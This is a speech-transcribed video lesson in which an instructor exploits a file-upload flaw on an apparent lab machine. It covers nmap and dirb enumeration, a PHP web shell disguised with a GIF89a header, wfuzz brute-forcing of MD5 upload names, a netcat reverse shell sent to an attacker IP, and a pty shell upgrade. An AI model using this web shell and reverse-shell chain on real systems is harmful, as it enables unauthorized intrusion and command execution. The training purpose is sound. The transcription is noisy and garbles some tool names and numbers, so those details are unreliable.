Welcome to Global Offensive Hacker Associate Community and welcome to Offensive Web Attack and Security Program. In this hacking episode, I'm going to teach you how to penetrate web application, and we're going to cover file upload vulnerability. We're going to see how to perform an enumeration. We'll see how to identify the vulnerability and exploit in a proper manner. The tool I'm going to use in this particular video, this video is completely focused on WFuzz, shell uploading, and the third one is called as a bub suite. So I'm going to teach you how to create shell particular file, and how we can upload to the particular application and invoke the shell. And the last part, in the end, when everything is executed in a proper manner, I'm going to show you how to get a reverse connection back. So you can see there are many topics we have to cover today. I am Harshad, founder and CEO of Hacker Associate. Let's begin. So I'm going to the login to my Kali Linux, and just entering the password. So once you're logged in successfully, I want to scan the particular system. So you can see this is my IP address, which I'm going to scan this particular target. So let's do in a proper manner, how to scan this particular machine. So you can use nmap, and let me zoom for you. You can use -v, then minus capital V, then minus P, 1,265,535 port, and here I have a typo error. You can just change it, and then -A, and then everything is fine, and then IP address. Even if you want a timer, you can just put T4 and then IP address, which is 192.168, I think 0.107. So once you press enter, it will take a little bit time. Just wait for it. So what I found on this particular server is there are two ports running. One is port number 22, and the second port number is I think is 8000 something. Let me check it out in proper manner. So just waiting for the output. You can use space bar for percentage, and by the time what we can do is we can invoke a bub suite. So this is my Mac system. I'm going to use bub suite professional edition. But in this case, you don't need a professional edition. You can use a community edition. Community edition is fine for this particular lab. So this is a part of my offensive web attack and security program. So now I need a Firefox. So this is my Firefox. Configure the Foxy proxy or any of the proxy add-ons you have installed. So once it is start, then switch to this proxy. So let me just click here, manual proxy. You will just auto detect, and right now I will not do anything. Then close, next, start burp. By the time I will just change to manual proxy. Just click here. I think it's fine. So first you can go to the proxy, you can simple intercept off. So now you are ready to do anything. Now let's jump to the Kali, and you can see we have identified several information, so which are here. So you can see the 22 port number, and we got the version, and second you can see the port number 8000, where we have the Apache HTTPD 2.4.25, and it support all the method, and we had seen already how to exploit this particular part if the allowed method are get, head, post, and options. So right now I'm not focusing on this request method. I'm focusing on especially on focusing on vulnerability part. So here we have some hint here. You can see 8000 port is open. So let me go in this section, and you can see when I try to open this application, 192.168.0.107 and the port number 8000, it looked like this. But when you try to open in Mozilla Firefox, in my Mac system, it will look different. It will be in the broken pieces. For example, 0.107:8000, enter, and you can check here, right? You can see it is in broken pieces. I'm not able to see properly. But on the other hand, if you go to the Kali, you can see I'm able to see everything in a proper manner. So why I'm getting out this output in this Kali Linux, and why it is different in my Mac system? So because when you see in the broken pieces, what you can do is you can simple go and check with this setting. Just type nano and then type etc host command. So let me use tab, and then there is a file. So I have made an entry, okay, this is my target IP address, okay, resolved on the local host. So you will ask one question here, why, okay, this is the local host. So let me give the answer for this, Control X. So when you, okay, go to this section, right, this website, okay, I have open, okay, in my Mac system, just right click and just go here, view page source. So when you go to the view page source, you can see local host here, and when you analyze the entire web page, you will see everywhere localhost. So I thought, okay, I will change it, okay, that IP address and result to the localhost and then check the output. And so when I have done this thing, I'm getting this result. After that, okay, you can see here, okay, there will be one username is handsome container. But for more clarity, what I can do is I can check with the dirbuster. So you can open a terminator, okay, you can go to the dirbuster dirb and just type here http and then the particular IP address. So if you type this command and press enter, you will get error because the server is running on port number 8000. So you can use it accordingly. And okay, you will find some interesting detail here. So what I found, okay, when I run dirbuster, okay, which is called directory brute forcing. So I found robot.txt, which will, okay, shortly you will see, okay, here. So one is index.php, second is robots.txt. So now I can copy that particular link from this section, or I can simply just type here 8000 slash robots.txt. When you press enter, you can see I have two files. One is upload.php, second is upload. So let's verify it, okay, like what is available, okay, under this section. So let me remove the view source, okay, and remove this colon and then just type here upload.php and press enter. So when I press enter, you can see, okay, like I will get, okay, like some option, okay, to something I can upload here, right, this part. So you can see I have a select image option. Let me zoom for you a little bit. And then, okay, you can see there's a browse functionality and then you have submit button, right? This is, okay, like three part, okay, you can use it. So you want to browse, you can simply click here and you are able to select the particular image. But before proceeding, okay, before doing anything here, what I can do is I can simply right click and check for the view page source. This is the best habit, okay, always check the view page source. So now you can see little bit here, okay, HTML, then body, then is a post method, and then multi-part form data. Okay, we didn't get any much information, but if we go down a little bit, you can see there is a link available here. So copy that link. So copy that link and paste, okay, in the system, just like that. And here, okay, you will see some file, view page source. Waiting for the output. So here you can see, okay, we have this file, okay. So now I will just try, okay, here, okay, copy paste and then check again. So I'm getting again same, I don't know why this is coming, but okay, here you can see what I want to focus on this particular part is this upload.php. So when you click on upload.php, okay, here, okay, is the code, source code disclosed, okay, in this functionality, okay, a file upload. So when you try to read, okay, from the top, you can see this HTML, this is the body, and here you can see center, form action, post. After that there is submit button, okay, and then after further, if you start from this section is called random number 1 to 100, then target directory you can see is upload. It is going to upload, okay, in the directory, and the same, okay, we got it here, the hint. If you can check the robot.txt, here is upload. So whenever, okay, you try to upload, it will save, okay, in this upload directory. So now further, okay, if I go, okay, the target directory, and they are creating a MD5 of that, and one is uploaded, you will see the message call as a 1. And if you check little bit, okay, is accepting this image PNG and then MIME, you can see we have a GIF upload, okay. So you got a little bit hint here. So what I can do is I can create one shell here. So how to create it? Let's go to the Google Chrome, open a notepad. So I will show you, okay, how to create your own shell. So simple, okay, you can open a notepad and write this command with me. So first we will start with the PHP. So just write it here, just like that, colon, okay, lesser than question mark PHP, and you can also write like that. You can close it accordingly, and between, okay, you can write system. So example, the system, and then you can use a dollar. So let me just type dollar underscore get. Okay, then we just have to type cmd and then close and then close and termination. So okay, this okay is called a shell. We'll rename it okay to the shell.php and we'll try to upload it. Okay, so in my case I have already done it. So if you go here, okay, just type item. So this is my item. Okay, so let me go to the desktop and show to you. So this is my desktop, and here if you just type ls command, you can see this is the HackOS shell.php. Just type cat command and you can see the code is written here. You can see the PHP syntax, and here is the system $get cmd, and then here we have a GIF 89a. Okay, this is important. Okay, in the terms of you want to upload okay like GIF image. So sometime okay, when you try directly without this particular part like JPEG or JPEG or any other extension you try, you will get an error. So what I can do is I can simply okay type this coding okay GIF 89a and then termination, and then this is shell. So once you're done with this particular part, try to upload it. So before uploading anything, what I can do is I need a bub suite in between. So this is my Mozilla to check okay like this is working or not properly. So let me remove okay like this source code now. So okay, so now this is the functionality, and my bub suite is running okay fine. Browse it. So on my desktop I have written the code, name is hackshell.php, and you know already this is the code. Then open it. So now before clicking here, okay, what I can do is I can go to the bub, intercept on. Now go to the Mozilla, submit it. When you submit it, you can see okay the bub suite. This is the file came here, and here is my the code which I written there, right? Now what I can do, I can send to the repeater and check the functionality. Send to the repeater, and you can see sent. Now you can see it is uploaded here, and uploaded okay in this directory name is upload this directory. So when you go to the Kali back, our file is uploaded, but the problem is when you try to hit upload directory, you will get an error. So example, if you go to this section, you can see upload.php, and here okay is the functionality. So when you try okay to fetch upload, you can see you are getting an error. You don't have a permission to access. So this is the problem. But according to the source code which we identified here, after that what is creating, it is creating the MD5 hash of this. So now what we have to do is we need to generate okay like the MD5. So how to do that? So what I can do, I can go to the Mac terminal, and I have written okay another file. When if you want to write, you can write with me. I'll go to CD, I'll go to the desktop, and here okay is my file. So attack hackos.php. Okay, so you can use a nano and create a file. So right now I'm just going to show you okay what is the content inside this, what are the content. So here okay you can see we have a lesser than PHP, and you can see here okay the loop, like because as we know okay according to this coding is a random function okay generating 1 to 100. So it's not difficult to brute force okay, right, because only we have a probability from 1 to 100. So now you can see the loop. I think if you know little bit programming, this is a for loop, and starting from a 1 okay lesser than equal to 100, then incremental function, and echo means whatever right after echo it will print it. So you can see the MD5 of exact whatever we have uploaded. So we have uploaded okay, you can see on my left hand side in the bub case it is called HackOS underscore shell.php, and calling to this function, and after that okay we have echo, then r, then n, and close it. So once you're done with this particular part, what you have to do is you will okay we are going to invoke the w first. Okay, we will be going to check everything. So now this is attack okay, and you can just rename it okay this particular file to the some other extension. So next step is this. So when I go to the Kali Linux, so let me open a new terminal. So if you go to this exploit cd/where www html and then exploits and then ls, here okay I have okay this file, by the way this is okay, you can see the same file which I have used here okay, I showed to you before. So now here you can see this is the coding, and you can rename it. You can simply run PHP and then attack name just like that. You can see these are all hashes, right, as per this coding. You can see it is creating the MD5 of the particular file. Fantastic. So we got something here. So now I can rename the particular file. So what you can do is you can simply just type php and you can just type here and just redirect to the anything.txt. So in my case, what I had done is I have already done this thing, and you can see this is my ha.txt. It is the exact same thing. So example, if I type ha.txt, the same hashes are involved. Now the final part is the trick part is, okay, what I have to do is I have to use a wfuzz utility. You can use many, there are many methods are available, okay, to in order to get the shell. So right now I'm going to use a wfuzz command. Okay, so how to use wfuzz command? As we know, we don't have a permission of the upload directory, and it is a Dustbuster, it is still running. And here is my command. You can see this is the command which I'm going to use it. A wfuzz -w ha.txt, which is already available, okay, in this directory, and 404, and this is the upload directory first.php. When you press enter, you can see here, okay, like it is checking for the hash and we didn't get any hash, right? So what I can do is I can immediately go to the repeater one more time, okay, I will send the shell. You can see here, send this particular file once again. So you can see it is okay, it uploaded in this upload directory. Now you can go immediately to the Kali Linux, which is here, and run the wfuzz command and press enter. And you can see now you got the hash. Fantastic. Now what you can do, you can simply copy it, copy this particular, okay, hash. Now you can go to the browser, which is here, and now what you can do is, okay, we have upload.php, right? Now I will use /uploads/ this particular, okay, hash php, and then question mark I will type cmd equal to ls, enter. You can see I'm able to get all the information about this directory. Fantastic. So we got the hint, right? That's how it is. So now what you can do again, okay, you can go here, just click here send button, repeat it. Now go to the wfuzz. So we have this terminal here set up. So try, and you can see the hash will change continuously. So you can see the hash changes. So now we have this new hash here, just copy it. Copy and just try with this. So go to the Mozilla, and here, okay, we have a hash. Let me copy from this particular section and paste it. And what I can do is I can simple, okay, type, okay, like nc command. So nc, I want to give, okay, this to the attacker. So my attacker IP address is 0.103, and attacker listening on port number 14444 and -e/bin/sh. But this, okay, like you can see, okay, I'm not listening on any of the particular port. So what I can do is I can simply just type nc -l/vvp 4444 and just enter, and you can see here when you press enter, see the connection. Now we have to check for the connection. Let's go here, and you can see somewhere, okay, it is connected. No, 1 minute, let me confirm it. So let me check my IP address. It is I have config, okay, 0.103. Okay, here if we go a little bit downside, still it is running. Okay, here, okay, I'm just waiting for the connection. So nc -lvp 4444 and waiting for the shell is connected. I think you can see this is connected. Now when you just type, okay, command call id, and you can see you got the shell. Now here, okay, right now is a like we're not able to do properly, right? Here you can see this is not, okay, stable shell. Right now, okay, you can see how stable the shell I'm using. Okay, you can see I have a hash. So you can import it using a command call as a python -c single quote and then import pty termination, then pty spawn spawn /bin/bash, and then you can single close it. If everything okay, see you got it. So now, okay, further, okay, this is not a root shell. So further, okay, we can escalate the privilege as per, okay, we have seen, okay, in our last classes. So now, okay, I will give this task to you, to all my students, okay, who are, okay, with me right now, okay, in an online conference, okay, for OS training, offensive application attack training. Now your part is, from this particular point of view, try to escalate the privilege. You have a 1 hour time, and if you are not able to escalate the privilege, you're not able to get a root access, then just message me. Okay, I will be available, and then I will give you the solution on this, how to escalate the privilege and how to get the root access. I hope okay you understand okay this topic in a detailed manner. I'll summarize it okay before okay moving to the new topic. What I done is okay, I have used a bub sweep, okay, and I have configured properly with the Firefox. So whatever I will do with the browser, it will be going to intercept in the bub. One thing. Second is I research on this particular IP address. I found okay 2 ports are open. I try to open okay in browser and check the particular functionality. Identify okay like port 8000 is on working state, and okay like there's a one okay like file upload capability of the particular application. So I checked it and I identify the source code, and when I look to the source code, there is a okay like one function called random. It is okay like between 1 to 100, and whenever anyone upload a particular file okay using that particular function, what will happen okay is going to create a md5 of that. So what I did is okay, I uploaded the file. It is already saved in the upload directory, but I don't have a permission. So further okay, I had written the another code okay to the same file. Okay, we generated the md5, and using a w first utility okay we identify the hashes. So same hashes okay I have used okay in the upload directory, as you see okay in my browser, which is here. Still you can see this is the hash of the PHP, and then okay last part is like we got the reverse connection using a NC. So I hope this video is informative for you.